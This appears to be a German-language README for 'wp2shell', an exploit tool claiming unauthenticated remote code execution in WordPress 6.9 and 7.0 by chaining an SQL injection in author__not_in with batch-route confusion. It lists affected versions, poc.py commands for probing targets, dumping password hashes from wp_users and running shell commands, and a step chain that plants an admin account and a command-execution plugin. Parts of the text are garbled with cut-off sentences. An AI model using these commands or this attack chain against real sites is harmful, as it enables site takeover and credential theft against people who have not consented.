
wp2shell – Pre-Authentifizierungs-RCE im WordPress-Kern (CVE-2026-60137 + CVE-2026-63030). Verkettet eine SQL-Injection in author__not_in mit Batch-Routen-Verwirrung für nicht authentifizierte Remote-Codeausführung auf WP 6.9.0–6.9.4 / 7.0.0–7.0.1.
| Bereich | Status |
|---|
| <= 6.8.5 | Nicht betroffen (keine Batch-Routen-Verwechslung) |
| 6.8.0 - 6.8.5 | Nur SQLi, kein RCE |
| 6.9.0 - 6.9.4 | Verwundbar |
| 7.0.0 - 7.0.1 | Verwundbar |
| 7.0.2+ / 6.9.5+ | Gepatcht |
python3 poc.py -u TARGET_URL
python3 poc.py -u TARGET_URL --sql "SELECT user_pass FROM wp_users LIMIT 1"
python3 poc.py -u TARGET_URL -c "id"
| Argumente | Verhalten |
|---|---|
-u TARGET_URL | Prüft, ob verwundbar (Timing-Probe) |
-u TARGET_URL --sql "SQL" | Extrahiert Skalarwert per Blind-SQLi |
-u TARGET_URL -c "CMD" | Vollständige RCE-Kette |
/batch/v1), um die Anforderungsverarbeitung zu desynchronisieren und die Authentifizierung zu umgehenauthor_exclude über ein SLEEP()-Timing-OrakelVulnerability check → Seed oEmbed posts → Extract table name (blind SQLi)
→ Extract admin ID (blind SQLi) → Extract cache post IDs (blind SQLi)
→ Inject poisoned changeset via batch → Create admin user
→ Login → Upload command plugin → Execute command → Cleanup
author__not_in: entdeckt von TF1T, dtro, haongo